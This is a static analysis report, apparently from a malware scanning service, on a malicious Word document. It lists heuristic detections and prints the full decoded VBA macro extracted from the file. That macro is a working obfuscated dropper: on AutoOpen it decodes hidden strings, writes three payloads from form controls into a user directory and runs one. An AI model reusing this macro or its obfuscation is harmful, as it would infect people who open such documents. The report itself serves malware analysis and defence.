Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 5bc4206e5f91f792…

MALICIOUS

Office (OLE) / .DOC

44.5 KB Created: 2026-06-12 02:35:00 Authoring application: Microsoft Office Word First seen: 2026-06-15
MD5: d9a0f30a247fccb947326e2df7a3760d SHA-1: 664d3b915d7e7f007fb16ea363b2a0e559235229 SHA-256: 5bc4206e5f91f7924aaa57d46b5e16b1998841ae1008d0943a5db3bc1684ce18
178 Risk Score

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set wsh = CreateObject(xibasbd)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
        result(0) = CallByName(UserForm1.Controls(vnsadf), tyvdf, VbGet)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        GetstoragePath = Environ(sbcba)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7508 bytes
SHA-256: c9cc9e570929e2053dd4aa8f0ff9b2fc80f436cf821e6b512913eb8634529442
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const keyHex = "436162666269617369767579"

Sub xvqkblk(cvacjgzddhi As String)
    Dim wsh As Object
    xibasbd = livbwfa("FDI" + _
    "BFA" + _
    "sZF" + _
    "V" + _
    "0a" + _
    "HhA" + _
    "VL" + _
    "w=" + _
    "=")
    Set wsh = CreateObject(xibasbd)
    
    wsh.Run GetQuoteStart() & GetC(cvacjgzddhi) & GetQuoteStart(), GetWindowStyle(), False
End Sub

Function GetQuoteStart() As String
    GetQuoteStart = Chr(34)
End Function

Function GetC(cvacjgzddhi As String) As String
    GetC = cvacjgzddhi
End Function

Function GetWindowStyle() As Integer
    GetWindowStyle = CalculateStyleValue()
End Function

Function CalculateStyleValue() As Integer
    CalculateStyleValue = SubtractValues(10, 5)
End Function

Function SubtractValues(a As Integer, b As Integer) As Integer
    SubtractValues = a - b
End Function

Function fileExist(filePath)
    Dim fso
    asbabc = livbwfa("EAI" + _
    "QD" + _
    "xIdC" + _
    "B" + _
    "0" + _
    "OW" + _
    "DMQL" + _
    "w" + _
    "Q" + _
    "xH" + _
    "xEd" + _
    "BB4m" + _
    "FB" + _
    "8" + _
    "c" + _
    "IBU=")
    Set fso = CreateObject(asbabc)
    If fso.fileExists(filePath) Then
        fileExist = True
    Else
        fileExist = False
    End If
    Set fso = Nothing
End Function

Private Function CleanInputString(s As String) As String
    On Error Resume Next
    CleanInputString = Replace(Replace(Replace(Replace(s, " ", ""), vbCr, ""), vbLf, ""), vbCrLf, "")
End Function

Private Function hbvaf(cleanedStr As String) As Byte()
    On Error Resume Next
    Dim objNode As Object
    Dim emptyBytes() As Byte
    
    Set objNode = CreateObject("M" + _
    "SX" + _
    "M" + _
    "L2" + _
    ".DO" + _
    "MD" + _
    "o" + _
    "c" + _
    "u" + _
    "m" + _
    "e" + _
    "nt").createElement("b6" + _
    "4")
        
    With objNode
        .DataType = "bi" + _
    "n.b" + _
    "as" + _
    "e6" + _
    "4"
        .Text = cleanedStr
        hbvaf = .nodeTypedValue
    End With
   
End Function

Function chstd(s As String) As Byte()
    Dim cleanedStr As String
    cleanedStr = CleanInputString(s)
    chstd = hbvaf(cleanedStr)
End Function

Private Function livbwfa(ByVal encodedStr As String) As String
    Dim decodedBytes() As Byte
    Dim keyBytes() As Byte
    Dim resultBytes() As Byte
    Dim i As Long
    Dim keyLen As Long
    Dim dataLen As Long
    Dim hexByte As String

    decodedBytes = chstd(encodedStr)
    If UBound(decodedBytes) = -1 Then
        livbwfa = ""
        Exit Function
    End If
    dataLen = UBound(decodedBytes) + 1

    keyLen = Len(keyHex) / 2
    If keyLen <= 0 Then
        livbwfa = ""
        Exit Function
    End If
    ReDim keyBytes(0 To keyLen - 1)
    For i = 0 To keyLen - 1
        hexByte = Mid(keyHex, i * 2 + 1, 2)
        If Len(hexByte) <> 2 Then
            livbwfa = ""
            Exit Function
        End If
        keyBytes(i) = CByte("&H" & hexByte)
    Next i

    ReDim resultBytes(0 To dataLen - 1)
    For i = 0 To dataLen - 1
        resultBytes(i) = decodedBytes(i) Xor keyBytes(i Mod keyLen)
    Next i

    livbwfa = StrConv(resultBytes, vbUnicode)
End Function


Private Function kabsd(buf As Variant) As Byte()
    Dim i As Long
    Dim tmp() As Byte
    
    If VarType(buf) <> vbArray + vbByte Then
        kabsd = Split("")
        Exit Function
    End If
    
    ReDim tmp(LBound(buf) To UBound(buf))
    For i = LBound(buf) To UBound(buf)
        tmp(i) = buf(i)
    Next i
    
    kabsd = tmp
End Function

Private Function WBTD(FileName As String, staticBuf() As Byte) As Boolean
    Dim fileNum As Integer
    Dim i As Long
    
    On Error GoTo ErrHandler
    
    fileNum = FreeFile
    Open FileName For Binary As #fileNum
    
    For i = LBound(staticBuf) To UBound(staticBuf)
        Put #fileNum, , staticBuf(i)
    Next i
    
    Close #fileNum
    WBTD = True
    Exit Function

ErrHandler:
    WBTD = False
End Function

Function WrtBnfile(FileName As String, buf As Variant) As Boolean
    Dim staticBuf() As Byte
    
    staticBuf = kabsd(buf)
    
    On Error Resume Next
    If UBound(staticBuf) < LBound(staticBuf) Then
        WrtBnfile = False
        Exit Function
    End If
    On Error GoTo 0
    
    WrtBnfile = WBTD(FileName, staticBuf)
End Function

Function vzexuqlaqfmxnd(path As String, conte As String)

    hwminiArra = chstd(conte)
    WrtBnfile path, hwminiArra

End Function


Function GetstoragePath() As String
    sbcba = livbwfa("FwQ" + _
    "PF" + _
    "g==")
    GetstoragePath = Environ(sbcba)
End Function

Function BuildDP1(appDataPath As String) As String
    asnca = livbwfa("Jg" + _
    "M" + _
    "NCQ" + _
    "lEBB" + _
    "cAAl" + _
    "s" + _
    "cOw" + _
    "Q" + _
    "=")
    BuildDP1 = appDataPath & "\" & asnca
End Function

Function BuildDP2(appDataPath As String) As String
    sdvv = livbwfa("ACA" + _
    "O" + _
    "D" + _
    "wA" + _
    "b" + _
    "BF" + _
    "4lNw" + _
    "AXI" + _
    "AkHF" + _
    "Ew" + _
    "N" + _
    "DR8" + _
    "=")
    BuildDP2 = appDataPath & "\" & sdvv
End Function

Function BuildDP3(appDataPath As String) As String
    ubv = livbwfa("J" + _
    "gU" + _
    "LE" + _
    "lBH" + _
    "CR" + _
    "8Z")
    BuildDP3 = appDataPath & "\" & ubv
End Function

Function GetFormContent() As String()
    Dim result(2) As String
    vnsadf = livbwfa("AA4" + _
    "PCw" + _
    "MH" + _
    "BTEc" + _
    "AgE" + _
    "W" + _
    "L" + _
    "VA" + _
    "=")
    tyvdf = livbwfa("A" + _
    "A" + _
    "ASE" + _
    "g" + _
    "sGD" + _
    "w" + _
    "==")
    result(0) = CallByName(UserForm1.Controls(vnsadf), tyvdf, VbGet)
    result(1) = CallByName(UserForm2.Controls(vnsadf), tyvdf, VbGet)
    result(2) = CallByName(UserForm3.Controls(vnsadf), tyvdf, VbGet)
    GetFormContent = result
End Function


Sub ypoc(destPath1 As String, destPath2 As String, destPath3 As String, content() As String)
    vzexuqlaqfmxnd destPath1, content(0)
    vzexuqlaqfmxnd destPath2, content(1)
    vzexuqlaqfmxnd destPath3, content(2)
End Sub

Sub checkrun(njivnbd As String)
    xvqkblk (njivnbd)
End Sub

Sub gdsfa(ByRef f1 As String, ByRef f2 As String, ByRef f3 As String)
    Dim baseDir As String
    baseDir = GetstoragePath()
    
    f1 = BuildDP1(baseDir)
    f2 = BuildDP2(baseDir)
    f3 = BuildDP3(baseDir)
    Call MaterializeAssets(f1, f2, f3)
End Sub

Sub MaterializeAssets(inPath1 As String, inPath2 As String, inPath3 As String)
    If Not fileExist(inPath1) Then
        Dim byteData() As String
        byteData = GetFormContent()
        ypoc inPath1, inPath2, inPath3, byteData
        Call asdfuib(inPath1)
    End If
End Sub

Sub asdfuib(targetPath As String)
    checkrun targetPath
End Sub

Function start()
    Dim f1 As String, f2 As String, f3 As String
    
    Call gdsfa(f1, f2, f3)
          
End Function

Sub AutoOpen()
start
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.